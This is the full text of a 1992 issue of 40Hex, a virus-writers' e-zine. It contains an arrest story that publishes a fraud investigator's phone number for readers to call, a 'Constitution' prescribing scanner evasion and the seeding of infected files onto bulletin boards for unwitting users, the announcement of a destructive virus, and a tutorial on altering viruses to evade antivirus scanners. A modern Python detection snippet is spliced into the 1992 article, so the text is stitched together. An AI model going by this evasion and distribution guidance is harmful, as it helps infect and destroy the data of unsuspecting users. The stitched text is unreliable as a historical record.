40Hex Number 5 Volume 2 Issue 1


        Welcome to Issue 5 of 40Hex, the monthly semi-annual magazine
published for all those interested in learning more about computer viruses.
        Lots of new news:

  1) Well, Hellraiser has lost computer and housing temporarily, so DecimatoR
     had taken over the magazine.  There has been so much new stuff, a lot got
     changed since the time I received this issue.  Special BIG ASS greets to
     him for all of his work on this issue.
  2) Digital Warfare is down, as Instigator got busted for phreaking.  We will
     let you know more when we know more.  Before its demise, its virus
     collection had grown incredibly, thus stocking 40Hex for life.
  3) LandFill BBS went back up. I am back in the scene again.  Give it a ring.
  4) As of the release of this file, I have heard of more busts, specifically,
     Gengis Kahn and Rain Man.... could be rumor.

     BTW, for those of you who have the "Anti-FiRe" virus, SCAN 86 catches
     it as "Infinity"... probably due to the text it contains.  Course, it was
     distributed on a VGA loader for the InFiniTy boards... heh heh heh...

                                              DecimatoR

                                              -)GHeap


                             40 Hex Mag Issue 5

        File 000..............................You Are Here
        File 001..............................BUSTED! Instigator's Story
        File 002..............................Virus Spotlight: Ambulance Car
        File 003..............................The 1963 Virus
        File 004..............................Alliance w/McAfee and Dvorak
        File 005..............................Virus Author's Constitution
        File 006..............................The SKISM Vengeance Virus Hex
        File 007..............................Finding Scan Strings II


Greets go out to: Hellraiser, Dark Angel, Demogorgon, Piff', Paragon Dude
                  Instigator, Night Crawler, Crow Meister, Lazarus Long,
                  Time Lord, Axiom Codex, and the rest of the Alliance crew.
40Hex Number 5 Volume 2 Issue 1                                      File 001


                         Instigator --- Busted!

At 2:40 pm EST, Jan 20, '92 a local cop pulled Instigator (me) out of my very
entertaining Social Studies class and informed me he, 1 other local cop and
2 MCI phone fraud investigators were gonna serve a warrant on my house and
confiscate my computer shit.  So the cop takes me to my house and they start
disassembling all of my computer stuff, and take all of my notes and shit.
They filmed all this.  They informed me I would be charged with theft of
services, credit card fraud and a bunch of other shit, like 3 felonies and
5 misdemeanors till they were done.  Anyways it's about a week and a half
after the incident now and they only formally charged me with theft of
services.  So the worst that is gonna happen is I will get 1 year of
probation.  The best thing is they are thinking of only giving me a citation
or totally dropping the charges.  I am supposed to get my system back after
the DA comes to my house so I can show him how I did it.  As for Digital
Warfare I wanna give to someone to set up.  Anyway I made it to the front
page of 3 local newspapers so here is one of the articles:


-------------------------------------------------------------------------------

               (Shit inside the ***( )*** are my comments)

                       From the front page of the     
                         Intelligencer Journal            

               2 "Hackers" caught stealing phone service
  
  Using sophisticated computers and telephones, two Lancaster County
computer hackers touched MCI, a Washington-based telephone communications
network, for approximately $4,700 last year. ***( Sophisticated phones? )***

  Their activities represent "only the tip of the iceberg" of 
telecommunications fraud, which carries an annual $1 billion to $1.5 billion
price tag, according to John Houser, a MCI spokesman. ***( Dick )***

  The two are accused of accessing MCI's computer and obtaining "25 card 
numbers, that we know about," Houser said.  "We know they made calls all over
the United States, to Canada, Great Britain, and West Germany"

  "None of the card numbers have been issued to Lancaster subscribers," 
Houser said. 

  Columbia police are charging an 18 year old borough resident with credit 
card fraud, unlawful use of a computer, theft of services, and criminal 
conspiracy according to Sgt. C. Joseph Smith. Police are withholding his 
identity until he is formally charged, Smith said.

  West Donegal Township chief Charles R. Bronte said a fifteen year old 
suspect ***( that's me! )*** living in his jurisdiction was being referred to
juvenile authorities by the department investigator, Cpl. Kenton Whitebread.

  Officers with both departments said this was an entirely new kind of
criminal case for them.

  "I'm still going over our suspect's statement," said Smith, "and even when
I'm done, I don't think I'm going to understand (all the technical jargon). 
We're getting a lot of help from MCI."

  "If our juvenile hadn't cooperated, it's possible we'd still be looking at
his equipment", Bronte said.  "He went into the computer, using his access
codes," ***( He means I logged on my board )*** " to retrieve the information
necessary to continue the investigation".

  Police confiscated computer telephone equipment, whose value is estimated
***( Estimated - Gimme a break!)***  in the thousands of dollars, when they
executed search warrants at the residences of both suspects, Jan. 20.

  "It was a real United Nations collection," said Bronte, "There were a 
number of different manufacturers" of the equipment taken in West Donegal.
***( United Nations collection? )***

  Most of the equipment taken in Columbia was made by Tandy, Smith said. 

  Both possessed programs and equipment which allowed their computers to
generate thousands of random numbers. 

  Houser said that once an individual had knowledge of MCI's calling card
format "they could access our computer switching equipment, and begin 
generating random numbers. ***( they make it sound so technical )*** They
could allow their equipment to run 24 hours a day."

  Houser declined discussing the company security, but acknowledged "We
became aware of an unusual number of calls coming into our computer line. We
eventually were able to trace those calls back to the originating telephone 
equipment." ***( ANI )***

  Bronte said MCI investigators arrived at his department early Monday
afternoon.  The warrant was executed at 2 pm, Bronte said.  "We took
investigators to the suspect's home, while Cpl. Whitebread picked up the
boy at his school."

  Smith said the Columbia warrant was served at 5:18pm on Monday.
The suspect and another individual were working on his computer at the time.
"They weren't doing anything illegal," he said.

  Smith said MCI first became aware of the two local hackers "about
Dec. 14".  They were monitoring them since."

  The officers said they did not believe either of the two profited
from their activities. ***( Free Phone calls! )***

  "I think it was just a case of him getting involved in something that
was entirely over his head," Bronte said.  ***( Yeah, right )***

  Houser said MCI's investigation was continuing.

  "We have reason to believe they shared some of their information with
others," he said. "At this time I can tell you we have no other suspects in
Pennsylvania, but that could change tomorrow."

  He said investigators were unsure at present if any of the computer
data had been transmitted to other hackers. ***( They said one paragraph up
that they thought we shared some of the information.. Duh )***

-------------------------------------------------------------------------------
    Update --
    ------

  Here are the current casualties on the 476-9696 system, which is owned by
  TeleConnect, a subsidiary of MCI.

Instigator    -----  $1970.70  -----  Theft of Services(1 Count)
Asphi         -----  $2700.00  -----  Unlawful Use of Computer
                                      Credit Card Fraud
                                      Theft Of Services
                                      Criminal Conspiracy
Dekion        -----   UNKNOWN  -----  UNKNOWN
Count Zero    -----  $83.63    -----  No Charges Just Billed (*)
VenoM         -----  $75.00    -----  No Charges Just Billed (*)

   Apparently the head of the operations is Terry Oakes.  He is the phone
   Fraud investigator in charge of the TeleConnect Investigations.  Give him a
   ring at 800-476-1234 Ext. 3045.  Thank you.

(*) In both cases parents were notified.
                                                -)GHeap

40Hex Number 5 Volume 2 Issue 1                                      File 002

                           Virus Spotlight:
                       The Ambulance Car Virus  

Here's a debug script of the Ambulance Car virus.  I've tested the virus
created from this, and it works.  Ambulance Car is a parasitic, non-resident
.COM infector.  It spreads rapidly, and has one of the neatest graphic
displays that I've seen yet in a virus.  When it activates, a little ambulance
drives across the bottom of the screen, from left to right, and a siren is
heard over the PC speaker.  Other than that, all this thing does is replicate.

To create the virus from the debug script, cut between the dotted lines and
type:

  DEBUG < REDX.TXT > NUL
 
-------------------------------------------------------------------------------


-------------------------------------------------------------------------------
                                                                            DA
40Hex Number 5 Volume 2 Issue 1                                      File 003

                               The 1963 Virus
                             
        Here's a debug script of 1963.  It's classified as an overwriting
virus, but it attaches the code it overwrites onto the end of the file it
infects...  so it overwrites, but it doesn't.  Sort of.

-------------------------------------------------------------------------------


-------------------------------------------------------------------------------
                                                                            DA
40Hex Number 5 Volume 2 Issue 1                                      File 004

                               Forty Hex 5
                                Presents

                        An Alliance Interview with
                         John McAfee + Jon Dvorak
                                   and
                     Hellraiser, Garbageheap, DecimatoR,
                      Count Zero, CRoW MeiSTeR, Instigator,
                       Demogorgon, Dark Angel, Night Crawler,
                        VenoM, Time Lord, Darkman.

    On Feb. 2nd of 1992, an alliance was run with members of PHALCON/SKISM,
    NuKE, and Ex-RABiD.  We started the conference by trying to call Patti
    Hoffman, who had a shit fit, and denied being the author of VSUM.  Nice
    of her to insult our intelligence.  But anyways, we then called McAfee,
    who was surprisingly a nice guy.  He was interested in what we had to say.
    Some of the topics covered were which viruses we had written, what types
    of viri they were (i.e. MemRes, Stealth...).  Another important topic
    covered the Bob Ross Virus which an associate of McAfee had misnamed the
    Beta Virus (it was first spread on a false version of BNU (1.90Beta)).

    On the following day, we started a second alliance, this time involving
    Count Zero, CRoW MeiSTeR, Dark Angel, Demogorgon, Garbageheap (moi!),
    Hellraiser, Instigator, Night Crawler and Time Lord.  Also in the
    conference were John Markoff (New York Times), Michael Alexander (Computer
    World), and John McAfee.  A variety of topics were covered, I won't go into
    specifics here, because in a future issue we will have a full transcript,
    and in this issue we will have the article from the Feb. 10, 1992 Vol. XXVI
    No. 6 issue of COMPUTERWORLD.

    ---------------------------------------------------------------------------
    CHALLENGE, NOTORIETY CITED AS IMPETUS FOR VIRUS DEVELOPERS(*Catchy title*)
                        By: Michael Alexander/CW STAFF

         What motivates a programmer to write a virus?  The thrill, declared
    Hell Raiser,(* that is supposed to be Hellraiser *) a self-styled virus
    author and a member of Phalcon/Skism, a group of about a dozen computer
    hackers scattered across North America.
         In an unusual telephone conference call to COMPUTERWORLD last week, 10
    callers who said they were members of Phalcon/Skism claimed to be
    responsible for writing several of the viruses now on the
    loose.(* CLAIMED?!?!?!!  Well, I suppose that he couldn't know if we were the
    real McCoy *)
         To protect their identities, the callers used such handles as Garbage
    Heap(* Grabbin' top billin'! *), Nightcrawler, Demogorgon, Dark Angel, and
    Time Lord.  They said their ages range from 15 to 23 years old, although
    COMPUTERWORLD could not independently verify their identities.

    GETTING ATTENTION
    -----------------
         The virus authors, as they called themselves, said they arranged the
    teleconference to air their side of the story, and to talk about their
    unorthodox and contradictory brand of computer ethics. (* Well... close,
    we were real bored... of course, who wants to talk to bored virus
    authors... *)  "For the most part, virus authors are seen as a lot more
    malicious than we actually are," Garbage Heap said.
         His compatriots said they write viruses mainly for the thrill but
    also for the challenge and the status it brings within the computer
    underground.  The group said it is not interested in doing harm, and
    seldom creates viruses that are deliberately designed to cause damage.
    "It's sort of like graffiti  -  getting our name across  -  and damage
    happens in the process," he claimed.(* Hellraiser *)
         As an example of the type of virus they write, the group took credit
    for writing the Bob Ross Virus, named after the painter of the same name
    who hosts a show on Public Broadcasting Service.
         "What it does is infect files and randomly displays 'Bobisms,' which
    are messages Bob Ross would say," Hell Raiser said.  "It doesn't format
    the hard drive or do any damage."
         However, other alleged members of Phalcon/Skism later admitted to
    writing viruses that are clearly intended to damage or destroy programs
    and data.(* Hellraiser again... *)
         The callers contended that they are virus "authors," not virus
    "spreaders," and that they are not responsible for the problems their
    creations cause.
         "The main difference is that an author may write a virus and may even
    upload that virus to a virus board, a [bulletin board system] oriented to
    virus programmers and spreaders," one virus author explained.
         "People, like a disgruntled employee who may have a gripe with
    someone else, download it and spread it that way," this virus author said.

    NOT LAWBREAKERS
    ---------------
         The virus authors also pointed out that since the act of writing a
    virus is not prohibited by law, they should not be viewed as criminals.
         The callers claimed that even if the group stopped writing viruses,
    the number of infections would not decline.  The problem of viruses has
    grown so large that new viruses have no impact overall, one said.
         "Our effect is fairly little," he asserted.
         The callers said that they have been writing viruses for about a
    year, and would probably continue for at least another year.  Eventually,
    they hope to find jobs as full time programmers, several said.
         There is no way to verify the callers' claims.  However, many of the
    monikers the callers used, as well as the name "Phalcon/Skism," have shown
    up in perhaps as many as half  -  about 100  -  of the viruses to appear
    in the past six or seven months, said John McAfee, president of McAfee
    Associates, an antivirus software publisher based in Santa Clara, Calif.
         The quality of the viruses is "mediocre," McAfee said. (* Can't win
    'em all can we, John? *)
    ---------------------------------------------------------------------------

    My thoughts on the article were that it was neutral, Mr. Alexander could
    have easily ripped us apart.  We didn't expect to come out looking like
    heroes, so why should we bitch.  Next month prepare for the official
    transcript of the interview.  Then we can truly establish what was said.

                                                -)GHeap


40Hex Number 5 Volume 2 Issue 1                                      File 005

                  ───────────────────────────────────────────
                  The Constitution of Worldwide Virus Writers
                  ───────────────────────────────────────────
                      Initial Release - February 12, 1992
                  ───────────────────────────────────────────
  
       We, the members of PHALCON/SKISM, in order to form a more perfect
  environment worldwide for the virus community, establish justice, ensure
  intracommunity tranquility, provide for the common defense and offense,
  promote the general welfare, and secure the blessings of liberty to
  ourselves and our posterity, do ordain and establish this Constitution of
  Worldwide Virus Writers.
  
       ARTICLE I - REGARDING ORIGINAL VIRII
            Section A - DEFINITION
                 The term "original virus" herein indicates programming done
                 exclusively by either one individual or group, with no code
                 taken from any other source, be it a book or another virus.
            Section B - CODE REQUIREMENTS
                 For an original virus to conform to the standards set by
                 this document, it must include the following:
                   1) The title of the virus in square brackets followed by a
                      zero byte should be in the code, in a form suitable for
                      inclusion into SCAN(1).  This is to ensure that the
                      name of the virus is known to those examining it.
                   2) The name of the author and his/her group affiliation/s
                      should be included in the code, followed by a zero
                      byte.  At the present, this is an optional requirement.
                   3) Some form of encryption or other form of stealth
                      techniques must be used.  Even a simple XOR routine
                      will suffice.
                   4) If the virus infects files, the code should be able to
                      handle infection of read only files.
                   5) It must have some feature to distinguish it from other
                      virii.  Creativity is encouraged above all else.
                   6) The virus must not be detectable by SCAN.
            Section C - IMPLEMENTATION
                 This section, and all sections hereafter bearing the heading
                 "IMPLEMENTATION" refer to the recommended method of
                 implementation of the suggestions/requirements listed in the
                 current article.
                   1) Virus_Name db '[Avocado]',0
                   2) Author     db 'Dark Angel, PHALCON/SKISM',0
  
       ARTICLE II - REGARDING "HACKED" VIRII
            Section A - DEFINITION
                 The term "hacked virus" herein refers to any virus written
                 by either one individual or a group which includes code
                 taken from any other source, be it a book, a code fragment,
                 or the entire source code from another virus.
                 The term "source virus" herein refers to the virus which
                 spawned the "hacked virus."
            Section B - CODE REQUIREMENTS
                 For a "hacked" virus to conform to the standards set forth
                 by this document, it must include the following, in addition
                 to all the requirements set down in Article I of this
                 document:
                   1) The title, author (if available), and affiliation of
                      the author (if available) of the original virus.
                   2) The author of the hacked virus must give the source
                      code of said virus to the author of the source virus
                      upon demand.
                   3) No more Jerusalem, Burger, Vienna, Stoned, and Dark
                      Avenger hacks are to be written.
                   4) The source virus must be improved in some manner
                      (generally in efficiency of speed or size).
                   5) The hacked virus must significantly differ from the
                      source virus, i.e. it cannot be simply a text change.
            Section C - IMPLEMENTATION
                   1) Credit db 'Source stolen from Avocado by Dark Angel of
                      PHALCON/SKISM',0
  
       ARTICLE III - REGARDING VIRAL STRAINS
            Section A - DEFINITION
                 The term "viral strain" herein refers to any virus written
                 by the original author which does not significantly differ
                 from the original.  It generally implies a shrinking in code
                 size, although this is not required.
            Section B - CODE REQUIREMENTS
                 For a "viral strain" to conform to the standards set by this
                 document, it must include the following, in addition to all
                 the requirements set down in Article I of this document:
                   1) The name of the virus shall be denoted by the name of
                      the original virus followed by a dash and the version
                      letter.
                   2) The name of the virus must not change from that of the
                      original strain.
                   3) A maximum of two strains of the virus can be written.
            Section C - IMPLEMENTATION
                   1) Virus_Name db '[Avocado-B]',0
  
       ARTICLE IV - DISTRIBUTION
            Section A - DEFINITION
                 The term "distribution" herein refers to the transport of
                 the virus through an infected file to the medium of storage
                 of a third (unwitting) party.
            Section B - INFECTION MEDIUM
                 The distributor shall infect a file with the virus before
                 uploading.  Suggested files include:
                   1) Newly released utility programs.
                   2) "Hacked" versions of popular anti-viral software, i.e.
                      the version number should be changed, but little else.
                   3) Beta versions of any program.
                 The infected file, which must actually do something useful,
                 will then be uploaded to a board.  The following boards are
                 fair game:
                   1) PD Boards
                   2) Lamer boards
                   3) Boards where the sysop is a dick
                 No virus shall ever be uploaded, especially by the author,
                 directly to an antivirus board, such as HomeBase or
                 Excalibur.
            Section C - BINARY AND SOURCE CODE AVAILABILITY
                 The binary of the virus shall not be made available until at
                 least two weeks after the initial (illicit) distribution of
                 the virus.  Further, the source code, which need not be made
                 available, cannot be released until the latest version of
                 SCAN detects the virus.  The source code, should it be made
                 available, should be written in English.
            Section D - DOCUMENTATION
                 Documentation can be included with the archive containing
                 the binary of the virus, although this is optional.  The
                 author should include information about the virus suitable
                 for inclusion in the header of VSUM(2).  A simple
                 description will follow, though the author need not reveal
                 any "hidden features" of the virus.  Note this serves two
                 purposes:
                   1) Enable others to effectively spread the virus without
                      fear of self-infection.
                   2) Ensure that your virus gets a proper listing in VSUM.
  
       ARTICLE V - AMENDMENTS
            Section A - PROCEDURE
                 To propose an amendment, you must first contact a
                 PHALCON/SKISM member through one of our member boards.
                 Leave a message to one of us explaining the proposed change.
                 It will then be considered for inclusion.  A new copy of the
                 Constitution will then be drafted and placed on member
                 boards under the filename "PS-CONST.TXT" available for free
                 download by all virus writers.  Additionally, an updated
                 version of the constitution will be published periodically
                 in 40HEX.
            Section B - AMENDMENTS
                 None as of this writing.
  
       ARTICLE VI - MISCELLANEOUS
            Section A - WHO YOU CAN MAKE FUN OF
                 This is a list of people who, over the past few years, have
                 proved themselves to be inept and open to ridicule.
                   1) Ross M. Greenberg, author of FluShot+
                   2) Patricia (What's VSUM?) Hoffman.
                   3) People who post "I am infected by Jerusalem, what do I
                      do?" or "I have 20 virii, let's trade!"
                   4) People who don't know the difference between a virus
                      and a trojan.
                   5) Lamers and "microwares puppies"
            Section B - WHO YOU SHOULDN'T DIS TOO BADLY
                 This is a list of people who, over the past few years, have
                 proved themselves to be somewhat less inept and open to
                 ridicule than most.
                   1) John McAfee, nonauthor of SCAN
                   2) Dennis, true author of SCAN
            Section C - MOTIVATION
                 In most cases, the motivation for writing a virus should not
                 be the pleasure of seeing someone else's system trashed, but
                 to test one's programming abilities.
       
            
                 
                   
  ----------
  1 SCAN is a registered trademark of McAfee Associates.
  2 VSUM is a registered trademark of that bitch who doesn't know her own
    name.
40Hex Number 5 Volume 2 Issue 1                                      File 006
-------------------------------------------------------------------------------
PHALCON/SKISM Vengeance virus.                            Released  02/03/92
Stats: Non-Resident .COM infector.                        in 40Hex Vmag
       Infects files larger than 1992 bytes
       Size of the virus is about 722 bytes


Note: This Virus is dedicated to the memory of Digital Warfare BBS, which was
      online up until January 20th, 1992.  On that fateful day, the BBS 
      computer was confiscated by local authorities.  Hopefully the board will
      come back up, and be as good as before...

This virus activates the 20th of every month.  Just for the fun of it, I'm not
going to tell you what this thing does upon activation.  I will say one thing -
unless you have suicidal tendencies, DON'T test it on your own machine, OR the
machine of someone you love.  It ain't pretty.  It IS destructive. (286+)  
It IS noisy.  And it IS named appropriately.
  
Text that can be found in the virus:

                         *** Vengeance is ours! ***

                             PHALCON/SKISM '92

As of Scan 86, this virus isn't found.  Since it is based on the Violator virus,
other scanners may find it.  Oh well.  

Have fun with this one, just don't run it on the 20th...  at least, not on 
YOUR machine!  

                         DecimatoR /PHALCON/SKISM 

-------------------------------------------------------------------------------

40Hex Number 5 Volume 2 Issue 1                                      File 007

                HOW TO MODIFY A VIRUS SO SCAN WON'T CATCH IT
                                PART II
  
  
  In Issue 1 of 40Hex, Hellraiser presented a simple (though incredibly
  tedious) method of searching for scan strings.  In short, this was his
  method:
  
    1) Make a small carrier file.
    2) Infect the carrier with the virus.
    3) Fill parts of the virus with a dummy value until you isolate the
       scan string.
    4) Modify the virus so it is not detectable, i.e. switch the order of
       the instructions.
  
  The problem is, of course, that step 3 takes a maddeningly inordinate
  amount of time.  I shall present a tip which will save you much time.
  The trick is, of course, to find out where the encryption mechanism,
  and hence the unencrypted portion where the scan string is usually
  located, lies.  Once the encryption mechanism is located, isolating
  the scan string is much simpler.
  
  Of course, the problem is finding the encryption mechanism in the first
  place.  The simplest method of doing this is using V Communications'
  Sourcer 486, or any similar disassembler.  Disassemble the file and
  search for the unencrypted portions.  Most of the file will be DBs, so
  search for any part which isn't.  Once you have located those parts, all
  you have to do is subtract 100h from the memory location to find its
  physical offset in the file.  You now have a general idea of where the
  scan string is located, so perform step 3 until you find it.
  
  Ack, you say, what if you don't have Sourcer?  Well, all is not lost.
  Load up the infected carrier in good old DEBUG.  The first instruction
  (in COM infections) should be a JMP.  Trace (T) into the JMP and you
  should be thrown into the area around the encryption mechanism.  Use the
  memory offset (relative to the PSP segment) and subtract 100h to find
  the physical location of the unencrypted portion in the file.  Once
  again, once you have this, perform step 3.  Simple, no?
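
  Read from the analyst's side, the leading JMP and the 100h rule described above give a quick static triage check for .COM files. This is an added example, not part of the original article; the function names, the 4096-byte tail limit and both sample images are assumptions constructed here.

```python
import struct

COM_LOAD_BASE = 0x100  # DOS loads a .COM image at offset 100h of its segment


def entry_jump_target(image: bytes):
    """File offset reached by a leading JMP, or None if there is none."""
    if len(image) >= 3 and image[0] == 0xE9:      # JMP rel16
        rel = struct.unpack_from("<h", image, 1)[0]
        mem = (COM_LOAD_BASE + 3 + rel) & 0xFFFF
    elif len(image) >= 2 and image[0] == 0xEB:    # JMP rel8
        rel = struct.unpack_from("<b", image, 1)[0]
        mem = (COM_LOAD_BASE + 2 + rel) & 0xFFFF
    else:
        return None
    file_off = mem - COM_LOAD_BASE                # memory offset minus 100h
    return file_off if 0 <= file_off < len(image) else None


def looks_appended(image: bytes, max_tail: int = 4096) -> bool:
    """Heuristic (assumed thresholds): entry jumps past the midpoint of the
    file into a short tail, the usual layout after code has been appended."""
    target = entry_jump_target(image)
    if target is None:
        return False
    tail = len(image) - target
    return target >= len(image) // 2 and tail <= max_tail


# Constructed samples: filler bytes only, no real program or virus code.
CLEAN = b"\xEB\x0E" + b"\x00" * 14 + b"\xCD\x20" + b"\x90" * 2000
SUSPECT = b"\xE9" + struct.pack("<h", 1997) + b"\x90" * 1997 + b"\xCC" * 722

if __name__ == "__main__":
    for name, img in (("CLEAN", CLEAN), ("SUSPECT", SUSPECT)):
        print(name, entry_jump_target(img), looks_appended(img))
```

  Some legitimate compilers and packers produce the same layout, so a hit is a reason to look closer at the file, not a verdict.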

  Sometimes, SCAN looks for the writing portion of the code, which
  generally calls INT 21h, function 40h.  This is usually, though not
  always, located somewhere near the encryption mechanism.  If it is
  not near there, all you have to do is trace through the virus until
  it calls the write file function.

  Another method of looking for scan codes is to break the infected carrier
  file into a series of 50 byte overlapping chunks.  For example, the first
  chunk would be from offset 0 to 49, the second from 24 to 74, the third
  from 49 to 99, etc.  Then use SCAN to see which chunk holds the scan code.
  This is by far the easiest, not to mention quickest, method.
  
  One side note on step 1, making the carrier file.  Some virii don't
  infect tiny files.  What you must do is create a larger file (duh).
  Simply assemble the following two lines:
  
      int 20h
      db  98 dup (0)
  
  (with all the garbage segment declarations and shit, of course) and
  you'll have a nice 100 byte carrier which should be sufficient in most
  cases, with maybe the exception of the Darth Vaders.
  
  Enjoy!
-------------------------------------------------------------------------------
                                                                     Dark Angel